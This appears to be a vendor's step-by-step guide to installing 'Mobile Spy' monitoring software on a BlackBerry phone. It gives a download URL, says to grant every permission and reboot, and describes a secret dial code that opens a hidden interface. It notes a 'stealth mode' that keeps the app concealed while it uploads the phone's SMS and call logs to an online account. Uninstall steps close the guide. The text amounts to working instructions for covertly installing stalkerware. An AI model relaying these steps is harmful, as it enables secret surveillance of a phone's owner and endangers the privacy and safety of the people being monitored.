After you have created your username and password, you should perform these EASY steps below. You do not need to connect your phone to your computer to install.
1. Open the Web Browser on your BlackBerry and type in the following address EXACTLY as shown. Then press Enter as shown in the screenshot below:
https://www.mobilespylogs.com/bb/ss.jad

2. Check the box to "Enable Application Permissions" as shown below, then click on the blue Download button.

3. When you get the Permissions screen, change all items in all three categories to "Allow". Then click your Menu button and go to Save as shown below.

4. You will then see the program install and should see the screen below. You should now REBOOT YOUR DEVICE to start the program for the first time! Simply turn the power off and then back on.
You need to now tell the program your username and password. So you will bring up the interface for the first time.

5. Now bring up the interface. Simply dial #12345* and press SEND. The interface will appear. You can press the END key during the "call" to speed up showing the interface.
Note: You can change the five numbers to any five digits later by going to "Change PIN".

6. When the interface appears for the first time you will be asked to enter your username and password. Remember to type it EXACTLY as you did when you created it because it's case sensitive. Then, press the Menu key and go to Login.

IMPORTANT NOTES
When you are finished with the interface, be sure to go to Menu > Close to go back to stealth mode. If you change logging settings, the phone needs to be rebooted to start with the new changes.
You are now ready to monitor using Mobile Spy. Send some test SMS messages and calls. Logs will start showing in your online account after a few minutes. To check logs, go to this specific login page to login from any Internet browser: https://www.mobilespylogs.com.
See the general User Guide for more info on checking logs.
REMOVING MOBILE SPY
To remove the BlackBerry software, bring up the interface and go to Menu > Uninstall. Then reboot your phone. Then bring up the interface one last time and the BlackBerry will tell you it needs to reboot to finishing removing the module. Select to reboot now and then the software is removed.
